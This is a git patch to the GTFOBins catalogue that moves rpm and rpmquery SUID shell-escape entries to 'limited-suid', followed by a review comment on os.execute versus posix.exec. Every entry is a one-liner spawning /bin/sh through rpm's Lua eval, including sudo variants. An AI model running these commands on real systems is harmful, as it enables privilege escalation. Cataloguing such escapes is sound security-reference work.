From bb4050810ebf7c71589a89e05c6df4ceae703231 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 10 Jan 2021 18:25:55 +0100
Subject: [PATCH] Fix rpm[query] SUID
---
 _gtfobins/rpm.md | 4 ++--
 _gtfobins/rpmquery.md | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md
index 6b440d7..ba8dafe 100644
--- a/_gtfobins/rpm.md
+++ b/_gtfobins/rpm.md
@@ -2,8 +2,8 @@
 functions:
 shell:
 - code: rpm --eval '%{lua:os.execute("/bin/sh")}'
- suid:
- - code: ./rpm --eval '%{lua:os.execute("/bin/sh", "-p")}'
+ limited-suid:
+ - code: ./rpm --eval '%{lua:os.execute("/bin/sh")}'
 sudo:
 - code: sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
 - description: |
diff --git a/_gtfobins/rpmquery.md b/_gtfobins/rpmquery.md
index 03fe575..aa4a601 100644
--- a/_gtfobins/rpmquery.md
+++ b/_gtfobins/rpmquery.md
@@ -2,8 +2,8 @@
 functions:
 shell:
 - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
- suid:
- - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
+ limited-suid:
+ - code: ./rpmquery --eval '%{lua:os.execute("/bin/sh")}'
 sudo:
 - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
 ---
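Review bot: In the `_gtfobins/rpmquery.md` hunk the new `limited-suid` entry calls `os.execute`, while the `shell` and `sudo` entries of the same file still call `posix.exec`, and neither the subject line nor the entries say whether that divergence is intended. Lua's `os.execute` takes a single command string and passes it to the C `system()` call, so the `"-p"` argument removed in the `_gtfobins/rpm.md` hunk was presumably never reaching the shell, which would explain the move from `suid` to `limited-suid` in both files. That reasoning is worth recording next to the data, for example a YAML comment above each `limited-suid:` key such as `# os.execute() goes through system(); whether privileges are kept depends on the system's default sh`. Both hunks show only the top of the front matter, so any explanatory text further down in either file is not visible here.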